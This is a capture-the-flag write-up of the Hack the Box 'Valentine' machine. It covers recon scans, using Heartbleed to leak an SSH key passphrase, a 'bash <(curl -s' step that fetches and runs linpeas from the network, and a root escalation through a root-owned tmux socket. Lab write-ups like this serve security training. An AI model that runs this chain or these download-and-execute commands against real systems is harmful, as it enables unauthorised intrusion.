Write-Up: HTB Valentine

5 min readNov 23, 2020

Valentine is an easy Linux box on Hack the Box. Let’s jump right in!

First off, run my Mercon script (combines nmap and smbmap/gobuster depending on what the nmap scan finds).

Looking at the output, it looks like we have a basic webserver with an ssh port open.

kali@kali:~/development/Mercon$ ./mercon.py -t Valentine -i -w /usr/share/wordlists/dirb/common.txt 
===== Running Nmap Scan =====
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 17:35 EST
Nmap scan report for
Host is up (0.025s latency).
Not shown: 997 closed ports
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_ssl-date: 2020-11-14T22:37:04+00:00; +1m18s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 1m17s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.92 seconds

[+] Gobuster Running
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
2020/11/14 17:35:47 Starting gobuster
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/cgi-bin/ (Status: 403)
/decode (Status: 200)
/dev (Status: 301)
/encode (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/server-status (Status: 403)
2020/11/14 17:36:10 Finished

Time to checkout the homepage before enumerating the directories we found with GoBuster. Nothing too interesting here, but it’s worth noting that the heart logo matches the heartbleed vulnerability logo. Made a note of that and then began jumping into the various directories.

Checking out /dev, it there a few files available. First, let’s look at notes.txt to see if there’s any helpful info that’s been left behind.

The more interesting file is “hype_key” that is full of hex. Time to decode it and see what the developers left us.

Well, this is very nice of them to leave behind. It’s a SSH private key! Unfortunately, it’s password encrypted and attempting to brute force it didn’t work… Well, time to keep enumerating. Let’s jump back over to nmap and see if this server is actually vulnerability to the heartbleed attack.

Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46


Lucky for us, it looks like the service is vulnerable :)

kali@kali:~/htb/valentine$ nmap -p 443 --script ssl-heartbleed
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 18:00 EST
Nmap scan report for
Host is up (0.024s latency).

443/tcp open https
| ssl-heartbleed:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://www.openssl.org/news/secadv_20140407.txt
|_ http://cvedetails.com/cve/2014-0160/

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds

Now it’s time to exploit. Copy the script from exploit db and give it a go (I filtered out lines with empty bytes to reduce noise). The results show some $text variable that looks like it is base-64 encoded.

I edited the script with the following to run the exploit 5 times, just to see if we get anything else from the server. Unfortunately, we didn’t find anything else.

if __name__ == '__main__':
for x in range(5):

Decoding the text variable gets us the following string.

kali@kali:~/htb/valentine$ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d

Let’s try this as the ssh key password and see where it gets us. And… it definitely gets us somewhere, a shell on the box!

kali@kali:~/htb/valentine$ ssh -i hype_key hype@
load pubkey "hype_key": invalid format
Enter passphrase for key 'hype_key':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

* Documentation: https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from

Send over linpeas to see if we can find anything blatantly wrong that will allow us to escalate our privileges.

hype@Valentine:~/Desktop$ bash <(curl -s

Linpeas highlights a tmux process running as root. Looking it up on google, looks like this is trivial to exploit and get root.

================================( Processes, Cron, Services, Timers & Sockets )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
102 550 0.0 0.1 24076 1252 ? Ss 14:35 0:00 dbus-daemon[0m --system --fork --activation=upstart
avahi 617 0.0 0.0 32172 468 ? S 14:35 0:00 avahi-daemon[0m: chroot helper
daemon[0m 1038 0.0 0.0 16900 376 ? Ss 14:36 0:00 atd
hype 2602 0.0 0.1 92220 1672 ? S 15:13 0:00 sshd: hype@pts/0
hype 2603 0.0 0.8 31648 8768 pts/0 Ss 15:13 0:00 -bash
hype 2804 0.1 0.1 4776 1112 pts/0 S+ 15:19 0:00 /bin/sh ./linpeas.sh
hype 3355 0.0 0.1 22352 1276 pts/0 R+ 15:19 0:00 ps aux
hype 3357 0.0 0.0 19864 808 pts/0 S+ 15:19 0:00 sort
root 1 0.0 0.2 24428 2420 ? Ss 14:35 0:00 /sbin/init
root 1006 0.0 0.0 19976 976 tty2 Ss+ 14:36 0:00 /sbin/getty -8 38400 tty2
root 1007 0.0 0.0 19976 976 tty3 Ss+ 14:36 0:00 /sbin/getty -8 38400 tty3
root 1010 0.0 0.1 26416 1672 ? Ss 14:36 0:00 /usr/bin/tmux -S /.devs/dev_sess

Run tmux with the /.devs/dev_sess path for -S (socket-path) and we have root!

hype@Valentine:~/Desktop$ tmux -S /.devs/dev_sess

root@Valentine:/home/hype/Desktop# id
uid=0(root) gid=0(root) groups=0(root)

Overall, this was a fun box to go through. Thanks for reading!